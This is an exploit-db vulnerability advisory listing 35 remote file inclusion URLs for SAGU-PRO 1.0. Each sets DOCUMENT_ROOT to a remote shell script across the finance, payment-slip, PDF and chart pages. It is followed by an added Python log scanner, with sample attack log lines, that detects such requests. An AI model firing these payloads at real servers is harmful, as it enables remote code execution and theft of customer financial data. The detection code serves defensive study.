SAGU-PRO 1.0 – Multiple Remote File Inclusions

  • Author: mat
    Date: 2010-04-04
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12052/
  • \\\|///
    \\- -//
     (@ @ )
    ----oOOo--(_)-oOOo--------------------------------------------------
    SAGU-PRO v1.0 Multiple Remote File Include Vulnerability
    Script: http://gulbf.com.br/?q=node/145
    Author: mat
    Mail: rahmat_punk@hotmail.com
    ---------------Ooooo------------------------------------------------
     ( )
    ooooO ) /
    ( )(_/
     \ (
    \_)
    
    //-----------------------------------------------------------------------------------------------------------+
    http://[target]/[path]/cliente/ver_imagem.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/financeiro/importar_pgtos.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/financeiro/up_pgtos.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/financeiro/ver_pgtos.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/financeiro/boleto/boletounibanco.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/financeiro/boleto/bb/boleto_bb.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/financeiro/boleto/bradesco06/boleto_bradesco.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/financeiro/boleto/cef/boleto_cef.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/financeiro/boleto/hsbc/boleto_hsbc.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/financeiro/boleto/itau/boleto_itau.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/financeiro/boleto/real57/boleto_real.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/financeiro/boleto/recibo/recibo.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/financeiro/boleto/santader_banespa_102/boleto_santander_banespa.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/financeiro/cc/up_fluxo.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/financeiro/cc/importar_fluxos.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/financeiro/cc/ver_fluxos.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/financeiro/cc/post/altera_contacorrente.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/fpdf/clientes_ativos.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/fpdf/clientes_data_ativacao.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/fpdf/clientes_geral.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/fpdf/clientes_suspensos.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/fpdf/clientes_valores_cobranca.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/fpdf/clientes_vencto.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/fpdf/prev_outros_servicos.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/fpdf/prev_pacte_naveg.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/fpdf/resumo_log_pacote_conexao.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/graficos/graf_chamados_atendente.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/graficos/graf_evolucao_instalacoes_anual.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/graficos/graf_evolucao_instalacoes_mensal.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/graficos/graf_mensalidades_geradas_mensal.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/graficos/graf_visao_chamados.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/graficos/pre_graf_chamados_atendente.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/graficos/pre_graf_evolucao_instalacoes_mensal.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/graficos/pre_graf_mensalidades_geradas_mensal.php?DOCUMENT_ROOT=http://[shellscript]
    http://[target]/[path]/graficos/pre_graf_visao_chamados.php?DOCUMENT_ROOT=http://[shellscript]
    //-----------------------------------------------------------------------------------------------------------+
    
    Greetings: All Hackerz
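
Every request listed above carries a `DOCUMENT_ROOT` query parameter whose value is a remote URL, which makes the pattern easy to search for in web server access logs. The following Python script is an added example, not part of the original advisory; it assumes combined-format log lines, and the `/sagu` install path, IP addresses and hostnames in the sample are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Schemes that make an include path point off-host.
REMOTE_SCHEME_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

def classify(line):
    """Return None, 'override' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    verdict = None
    # parse_qsl percent-decodes names and values, so encoded forms match too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name != "DOCUMENT_ROOT":
            continue
        if REMOTE_SCHEME_RE.match(value):
            return "remote-include"
        verdict = "override"  # parameter supplied, but value is not a URL
    return verdict

def scan(lines):
    """Return (client_ip, path, verdict) for every flagged line."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            path = urlsplit(REQUEST_RE.search(line).group(1)).path
            hits.append((line.split(" ", 1)[0], path, verdict))
    return hits

# Constructed sample log lines (documentation IPs, assumed /sagu install path).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Apr/2010:10:00:01 +0000] "GET /sagu/cliente/ver_imagem.php?id=7 HTTP/1.1" 200 512',
    '198.51.100.7 - - [04/Apr/2010:10:00:02 +0000] "GET /sagu/fpdf/clientes_geral.php?DOCUMENT_ROOT=http://files.example.net/x.txt HTTP/1.1" 200 90',
    '198.51.100.7 - - [04/Apr/2010:10:00:03 +0000] "GET /sagu/financeiro/ver_pgtos.php?DOCUMENT_ROOT=hTTp%3A%2F%2Ffiles.example.net%2Fx HTTP/1.1" 200 90',
    '203.0.113.5 - - [04/Apr/2010:10:00:04 +0000] "GET /sagu/graficos/graf_visao_chamados.php?DOCUMENT_ROOT=/tmp HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same match, a query parameter named `DOCUMENT_ROOT`, can be used as a blocking rule at a reverse proxy or WAF in front of the application.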